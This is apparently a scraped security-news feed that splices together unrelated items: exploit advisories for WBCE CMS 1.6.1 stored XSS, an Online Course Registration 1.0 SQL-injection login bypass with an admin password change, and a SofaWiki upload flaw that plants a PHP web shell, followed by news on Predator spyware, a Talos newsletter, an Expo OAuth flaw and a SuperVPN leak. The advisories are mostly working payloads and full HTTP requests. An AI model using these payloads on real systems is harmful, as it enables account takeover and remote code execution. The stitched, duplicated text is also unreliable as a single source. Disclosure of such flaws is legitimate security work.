WBCE CMS version 1.6.1 suffers from a cross site scripting vulnerability.

    Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)Version: 1.6.1Bugs:  XSSTechnology: PHPVendor URL: https://wbce-cms.org/Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1Date of found: 03-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1Host: localhostContent-Length: 976sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-platform: "Linux"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtOAccept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167Connection: close------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="reqid"187de34ea92ac------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="cmd"upload------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="target"l1_Lw------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="mtime[]"1683056102------WebKitFormBoundary5u4r3pOGl4EnuBtO--3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)========================================================================================================================###XSS-2###1. go to pages  (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)2. add page3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3Epoc request:POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1Host: localhostContent-Length: 143Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475Connection: closepage_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

WBCE CMS 1.6.1 Cross Site Scripting

Security researchers have shared a deep dive into the commercial Android spyware called Predator, which is marketed by the Israeli company Intellexa (previously Cytrox).
Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android.
The spyware, which is delivered by means of

Security researchers have shared a deep dive into the commercial Android spyware called Predator, which is marketed by the Israeli company **Intellexa** (previously Cytrox).

Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android.

The spyware, which is delivered by means of another loader component called Alien, is equipped to record audio from phone calls and VoIP-based apps as well as gather contacts and messages, including from Signal, WhatsApp, and Telegram.

Its other functionalities allow it to hide applications and prevent applications from being executed upon rebooting the handset.

"A deep dive into both spyware components indicates that Alien is more than just a loader for Predator and actively sets up the low-level capabilities needed for Predator to spy on its victims," Cisco Talos said in a technical report.

Spyware like Predator and NSO Group's Pegasus are carefully delivered as part of highly-targeted attacks by weaponizing what are called zero-click exploit chains that typically require no interaction from the victims and allow for code execution and privilege escalation.

"Predator is an interesting piece of mercenary spyware that has been around since at least 2019, designed to be flexible so that new Python-based modules can be delivered without the need for repeated exploitation, thus making it especially versatile and dangerous," Talos explained.

Both Predator and Alien are designed to get around security guardrails in Android, with the latter loaded into a core Android process called Zygote to download and launch other spyware modules, counting Predator, from an external server.

It's currently not clear how Alien is activated on an infected device in the first place. However, it's suspected to be loaded from shellcode that's executed by taking advantage of initial-stage exploits.

"Alien is not just a loader but also an executor — its multiple threads will keep reading commands coming from Predator and executing them, providing the spyware with the means to bypass some of the Android framework security features," the company said.

The various Python modules associated with Predator make it possible to accomplish a wide array of tasks such as information theft, surveillance, remote access, and arbitrary code execution.

The spyware, which arrives as an ELF binary before setting up a Python runtime environment, can also add certificates to the store and enumerate the contents of various directories on disk if it's running on a device manufactured by Samsung, Huawei, Oppo, or Xiaomi.

That said, there are still many missing pieces that could help complete the attack puzzle. This comprises a main module called tcore and a privilege escalation mechanism dubbed kmem, both of which have remained elusive to obtain thus far.

Cisco Talos theorized that tcore could have implemented other features like geolocation tracking, camera access, and simulating a shutdown to covertly spy on victims.

The findings come as threat actors' use of commercial spyware has witnessed a surge in recent years just as the number of cyber mercenary companies supplying these services are on an upward trajectory.

While these sophisticated tools are intended for exclusive use by governments to counter serious crime and combat national security threats, they have also been abused by customers to surveil on dissidents, human rights activists, journalists, and other members of the civil society.

As a case in point, digital rights group Access Now said that it uncovered evidence of Pegasus targeting a dozen people in Armenia – including an NGO worker, two journalists, a United Nations official, and a human rights ombudsperson in Armenia. One of the victims was hacked at least 27 times between October 2020 and July 2021.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

"This is the first documented evidence of the use of Pegasus spyware in an international war context," Access Now said, adding it began an investigation after Apple sent notifications to the individuals in question that they may have been a victim of state-sponsored spyware attacks in November 2021.

There are no conclusive links that connect the spyware use to a specific government agency in either Armenia or Azerbaijan. It's worth noting that Armenia was outed as a customer of Intellexa by Meta in December 2021 in attacks aimed at politicians and journalists in the nation.

What's more, cybersecurity company Check Point earlier this year disclosed that various Armenian entities have been infected with a Windows backdoor referred to as OxtaRAT as part of an espionage campaign aligned with Azerbaijani interests.

In a more unusual turn of events, The New York Times and The Washington Post reported this week that the Mexican government may be spying on itself by using Pegasus against a senior official in charge of investigating alleged military abuses.

Mexico is also the first and most prolific user of Pegasus, despite its promises to cease the illegal use of the notorious spyware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Predator Android Spyware: Researchers Sound the Alarm on Alarming Capabilities

Steam, the most popular video game storefront on PCs, only recently announced that it was ending support for Windows 7 and 8, and even then, it won’t be official until January.

Thursday, May 25, 2023 14:05

Welcome to this week’s edition of the Threat Source newsletter.

As a longtime macOS user, I must admit I’m behind the times when it comes to Microsoft Windows. Since buying a Steam Deck, I’ve actually come to learn more about Linux and the Proton compatibility layer than I ever did about Windows.

But it still came as a shock to me this week when I uncovered a weird trend on social media: People bragging about still using Windows 7.

Microsoft stopped putting out free security updates for Windows 7 in January 2020 and only more recently stopped offering its paid Extended Security Updates (ESU). The company explicitly told users at the beginning of this year that it was unsafe to continue to keep using Windows 7 and that users should upgrade to Windows 10 or use a new machine that can run Windows 11.

Yet I still found an entire subreddit dedicated to keeping Windows 7 up and running on computers and countless posts promoting how well the 13-year-old operating system runs with modern GPUs and graphics cards.

Steam, the most popular video game storefront on PCs, only recently announced that it was ending support for Windows 7 and 8, and even then, it won’t be official until January. And Roblox, which is quietly one of the biggest video games in the world, only recently ended support for Windows 7 and 8.

I’m sure there are other examples of this among other types of software, but video games are the most specific corner of the internet I’m in, so that’s my frame of reference.

The moral of the story here is that using Windows 7 to do anything, but especially connecting to the internet (which is required to download and play video games) is a terrible idea. Attackers are always targeting outdated operating systems because they’re the most likely to be unpatched and vulnerable.

Running an operating system that is no longer receiving any type of security updates is extremely dangerous. If infected, that single machine could also be used as a springboard for the attacker to target and infect other machines on your network.

Since the start of this year, there have been 47 vulnerabilities discovered in Windows 7, according to the U.S.’s National Institute of Standards and Technology Vulnerability Database. There are even more security issues with third-party software running on Windows 7.

Just because something is old, doesn’t mean that attackers aren’t paying attention anymore. Without official support or security updates for Windows 7, Microsoft is no longer compelled to disclose formal vulnerabilities with CVEs attached to inform users about any security holes in the operating system.

Upgrading a PC or buying a new one is expensive, I get it. But Windows 7 isn’t a novelty anymore, it’s a security risk. If you feel like you absolutely have to keep Windows 7 running on a machine for some reason, make sure it is isolated from your network or just doesn’t connect to the internet at all.

But more preferably, upgrade to Windows 10. If you’re already using Windows 7, it’s free, and likely whatever hardware you’re using can support Windows 10. If you’re starting from scratch, many online stores have deeply discounted product keys for Windows 10 or 11 for $20 or less — just make sure to download the ISO directly from Microsoft still.

**The one big thing**

Montana recently became the first state in the U.S. to ban the app TikTok, though the law still has a long way to go before it can be enforced. The state’s governor signed a bill last week that prohibits mobile application stores from offering the app in the state by the start of 2024, or else they’ll face fines. However, it’s currently unclear if it’s even feasible for Montana to enforce this ban, as app stores don’t geofence certain applications on its stores, and internet service providers are exempt from having to enforce these rules. TikTok has recently become a target for Republican lawmakers over concerns that its Chinese-backed parent company is collecting and using Americans’ data. TikTok and popular TikTok creators in Montana have already sued the state to stop the law.

**Why do I care?**

Even if you are not an active TikTok user, the ban is noteworthy because it has major implications for American law and the enforcement of the First Amendment in the U.S. Opponents of Montana’s bill say it's a clear violation of the First Amendment. The various legal challenges are likely going to shift through the legal system for months, but any eventual decisions could influence how states view banning certain technology or even books and movies.

**So now what?**

There are many questions still unanswered about how this ban will work or whether it will stand. So for now, interested parties can’t do much but sit back and wait for the legal proceedings to play out.

**Top security headlines of the week**

Apple released a security update for many of its devices last week that **fixed three zero-day vulnerabilities in the WebKit browser engine.** A few days after the patches initially dropped, security researchers also discovered the updates addressed a different vulnerability known as “ColdInvite” (CVE-2023-27930). An attacker could exploit ColdInvite to attack a co-processor chip on iPhones and escape its isolation environment, eventually accessing the iPhone’s kernel. The three WebKit vulnerabilities affect some iPhones and iPads. CVE-2023-28204, CVE-2023-32373 and CVE-2023-32409 could be exploited to escape the Web Content sandbox. Google’s Threat Analysis Group and Amnesty International co-reported CVE-2023-32409, which led many security experts to speculate means attackers exploited this issue to spread spyware. (SecurityWeek, Forbes)

**Two popular Android set-top TV boxes sold on Amazon are preloaded with malware** that quietly generates revenue for the manufacturers in the background. The devices click on ads while running without the user knowing and connect to a global botnet of other infected Android devices around the globe. Despite the reported security issues, the devices were still for sale on Amazon as of earlier this week. However, the security researcher who discovered this botnet worked with the internet company hosting the command and control servers that sent directions to devices part of the botnet to take those servers down. However, that doesn’t mean the botnet or ad-click malware could never come back — the easiest solution for users is to replace the devices immediately. (TechCrunch, ArsTechnica)

Security researchers are concerned that **two new top-level domains from Google — .zip and .mov — will cause confusion among users and potentially open the door for scammers.** Because these new TLDs (like .com, .gov, .uk, etc.) are the same as popular file extensions, adversaries could disguise legitimate-looking file names and actually send people to a malicious web address without the user knowing that it could even be a web page. They could also be used to create legitimate-looking URLs that match that of a real website but just add one character in a long string, eventually pointing people to a malicious file or site. However, Google says it's actively monitoring for domain abuse. (Wired, Ars Technica)

**Can’t get enough Talos?**

*   Highlights of Talos IR On Air: Reviewing Q1's top threats
*   Beers with Talos Ep. #135: The XDR Files
*   Talos Takes Ep. #139: RA Group is just the latest example of the ransomware landscape splintering

*   Beers with Talos Ep. #136: Oh hello, “Susan”

**Upcoming events where you can find Talos**

**Cisco Live U.S. (June 4 - 8)**

Las Vegas, NV

**Discover Cyber Workshop for Women** **(June 8)**

Doha, Qatar

**REcon (June 9 - 11)**

Montreal, Canada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78  
**MD5:** c720ac483a5752c2b69945a8ad673162  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** DeepScan:Generic.BitcoinMiner.9.88FBC400

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

It’s apparently hip to still be using Windows 7

2023 Online Course Registration version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing## Author: nu11secur1ty## Date: 05.25.2023## Vendor: https://github.com/nikhilkeshava## Software: https://github.com/nikhilkeshava/online-course-registration-## Reference: https://portswigger.net/web-security/sql-injection,https://portswigger.net/web-security/sql-injection/lab-login-bypass## Description:The `username` parameter appears to be vulnerable to SQL injectionattacks. The payloads 77834251' or 6127=6127-- and 98762777' or4535=4542-- were each submitted in the username parameter. These tworequests resulted in different responses, indicating that the input isunsafely incorporated into a SQL query. The attacker can use thisbypass login vulnerability to send a remote POST request to set a newadministrator password for himself, which is absolutely nasty.STATUS: HIGH Vulnerability[+]Payload:```POSTPOST /online-course-registration/admin/index.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 62Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeusername=nu11secur1ty%27+or+1%3D1%23&password=password&submit=```[+]Exploit:```POSTPOST /online-course-registration/admin/change-password.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 58Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/change-password.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closecpass=password&newpass=password5&cnfpass=password5&submit=```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)## Time spend:01:15:00

2023 Online Course Registration 1.0 SQL Injection

SofaWiki <= 3.8.9 has a file upload vulnerability that leads to command execution.

1.  The PHP file an be uploaded directly by matching referer.

    // index.php
    case 'uploadbigfile':   		if ($user->hasright('upload', '') || stristr($swBaseHrefFolder,$referer))
    							{
    									include 'inc/special/uploadbigfile.php';
    							}
    

    // uploadbigfile.php
    if (isset($_FILES['uploadedfile']) && is_uploaded_file($_FILES['uploadedfile']['tmp_name']))
    {	 
    	 $filename = $_FILES['uploadedfile']['name'];
    	 $newfile = $swRoot.'/site/uploadbig/'.$filename;
    	 move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$newfile);
    	 
    	 $checksum = md5_file($newfile);
    	 if ($checksum == $filename)
    	 {
    		 echo 'upload ok '.$filename;
    	 }
    	 else
    	 {
    		 echo 'checksum error filename '.$filename.' checksum '.$checksum. ' length '.filesize($newfile);
    		 unlink($newfile);
    	 }
    	 
    	 $_FILES = null;
    	 
    	 exit();
    }
    

2.  Send a request package to get checksum.

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 243
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="idontknow"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

3.  Send three request packets using checksum to create a malicious PHP file.

> 1st

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 283
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="checkchunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh--
    

> 2nd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 266
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="edc4325bdef3f7fb70abd0389e85f6d1"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

> 3rd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 574
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfeK0BammsIbqUGBr
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="composechunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="comment"
    
    test
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="uploadtime"
    
    1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="start"
    
    0
    ------WebKitFormBoundaryfeK0BammsIbqUGBr--
    

4.  After uploading a malicious PHP file, arbitrary code can be executed.

CVE-2023-29721: [Vuln]There is a file upload vulnerability that leads to command execution. · Issue #27 · bellenuit/sofawiki

A cybersecurity vulnerability found in an implementation of the social login functionality opens the door to account takeovers and more.

A vulnerability in the implementation of the Open Authorization (OAuth) standard that websites and applications use to connect to Facebook, Google, Apple, Twitter, and more could allow attackers to take over user accounts, access and/or leak sensitive information, and even commit financial fraud.

OAuth comes into play when a user logs in to a website and clicks on a link to log in with another social media account, such as "Log in with Facebook" or "Log in with Google" — a feature that many sites use to allow cross-platform authentication. A team from API security firm Salt Security's Salt Labs discovered the flaw, tracked as CVE-2023-28131, in the OAuth implementation in Expo, an open source framework for developing native mobile apps for iOS, Android, and other Web platforms using a single codebase.

Specifically, the flaw potentially could affect any users that use various and social media accounts to log into an online service that uses the framework, the researchers revealed in a blog post published May 24.

The vulnerability is the second — and more impactful — one that Salt researchers have found in an online platform's implementation of OAuth, which is proving to be a tricky standard to implement securely. In March, Salt discovered a flaw in Booking.com's implementation of OAuth that could have allowed attackers to take over user accounts and gain full visibility into their personal or payment-card data, as well as log in to accounts on the website's sister platform, Kayak.com.

**Third-Party Risk With OAuth Implementation**

The flaw in Expo could have had a much wider impact than the Booking.com flaw, because of Expo's wide install base, Aviad Carmel, Salt security researcher, tells Dark Reading.

"Because this second OAuth vulnerability was discovered in a third-party framework used by hundreds of companies, the potential exposure was far greater," he says. "It could have impacted the OAuth implementations of hundreds of websites and apps."

Moreover, OAuth is becoming a de facto authentication standard in modern service-based architectures, as well as in emerging artificial intelligence (AI)-based platforms. This inherently means any vulnerabilities in OAuth implementations have a broad reach. In fact, in other research unveiled May 24, software-as-a-service (SaaS) security firm DoControl revealed that 24 percent of third-party AI apps require risky OAuth permissions.

Expo patched CVE-2023-28131 within hours after Salt researchers flagged the issue, and developers maintaining the platform recommended in a blog post detailing the flaw that customers update their Expo deployments to fully mitigate the risk.

However, the mounting list of OAuth vulnerabilities and the overall complexity of correctly configuring the standard that they highlight suggest that more websites and apps could have undiscovered flaws lurking beneath their surface.

The findings also demonstrate how enterprises are adversely and broadly affected when third-party frameworks introduce API vulnerabilities into their environment, often without them knowing. This puts customers at risk for credential leaks or account takeover, and gives threat actors a platform from which to launch further attacks, the researchers said.

**Exploiting the Expo Flaw**

When a user clicks on an OAuth-enabled link to log in to Site A with a social media account, Site A will then open a new window to Facebook, Google, or whatever trusted account is being used. If it's the user's first time visiting Site A, the social media page will ask for permission to share details with Site A. If the user has gone through the process before, the social media site will automatically authenticate the user to Site A.

Salt Labs researchers discovered CVE-2023-28131 in Codeacademy.com, an online platform that offers free coding classes across a dozen programming languages. Companies including Google, LinkedIn, Amazon, Spotify, and others use the site to help train employees, and the site has around 100 million users. The researchers ultimately exploited the flaw to gain complete control of Codeacademy.com accounts, they said.

The vulnerability in the OAuth implementation within Expo relates to the social sign-in process, Carmel tells Dark Reading. "When users sign in using their Facebook or Google credentials, Expo acts as an intermediary and transfers the user's credentials to the target website," he says.

Attackers could have exploited CVE-2023-28131 by intercepting this flow and manipulating Expo to send the user credentials to a malicious domain instead of the intended destination, Carmel explains.

This exploitation could have led to leaks of personal data or even financial fraud if attackers used credentials to log into users' financial accounts. Threat actors also could potentially have performed actions on behalf of users on their social media accounts, Carmel says.

**Why OAuth Is Tricky**

OAuth's popularity stems from how it can provide a much more seamless user experience for people when interacting with frequently used websites. However, it has a complex, technical back-end that can lead to implementation mistakes, creating security gaps that are ripe for exploitation, the researchers said.

To secure an OAuth implementation, then, an organization must understand how OAuth functions and which endpoints can receive user inputs, Carmel says.

"Attackers may attempt to manipulate these inputs, so validating each one is essential," he advises. "This can be achieved by maintaining a whitelist of predetermined values or implementing other strict validation methods."

Because of how complex OAuth implementations are proving to be, Salt Security plans to release a best-practice guide in the future to help enterprises security their OAuth implementations effectively, Carmel adds.

OAuth Flaw in Expo Platform Affects Hundreds of Third-Party Sites, Apps

By Habiba Rashid
SuperVPN is the same free VPN service provider that leaked customers' data back in May 2022.
This is a post from HackRead.com Read the original post: Free VPN Service SuperVPN Exposes 360 Million User Records

This time, SuperVPN has exposed a whopping 133 GB of data, including personal details of its unsuspecting users, such as IP addresses.

In a recent cybersecurity incident, security researcher Jeremiah Fowler discovered a significant data breach in a non-password-protected database associated with a popular free VPN service.

The exposed database contained a staggering 360,308,817 records, totalling 133 GB in size. These records included a wide range of sensitive information, including user email addresses, original IP addresses, geolocation data, and server usage records.

Additionally, the breach revealed secret keys, Unique App User ID numbers, and UUID numbers, which can be utilized to identify further useful information.

Other information found in the database encompassed phone or device models, operating systems, internet connection types, and VPN application versions. Furthermore, refund requests and paid account details were also present in the breach.

Type of leaked data (VPNmentor)

While SuperVPN claims that it does not store user logs, the leaked data shows otherwise and contradicts the company’s policy. This also goes to show that “_Almost Every Major Free VPN Service is a Glorified Data Farm_.”

With the increasing concerns over online privacy and security, the demand for VPN services has soared in recent years. Consequently, the market has witnessed a significant rise in the number of VPN apps available to users.

However, this surge in offerings has resulted in an alarming proportion of VPN apps that are unreliable and fail to provide the expected level of privacy and security. This results in a counterproductive user experience since a lack of adequate security protocols puts their information at risk of being leaked in a data breach.

The majority of records in the exposed database, according to VPNmentor’s report, were associated with SuperVPN, a free VPN application available on both the Apple and Google application stores.

Furthermore, researchers noted two apps named SuperVPN listed, each credited to separate developers. Qingdao Leyou Hudong Network Technology Co. was the developer behind SuperVPN for iOS, iPad, and macOS, while SuperSoft Tech developed the second app with the same name.

However, it is important to note that this is NOT the first time SuperVPN has been blamed for leaking the personal details of its unsuspecting users. In fact, as reported by Hackread.com in May 2022, SuperVPN was among the list of free VPN services that leaked details of over 21 million users. Other free VPN services to leak customer data included GeckoVPN and ChatVPN. In total, the database contained 10GB worth of data that was leaked on Telegram.

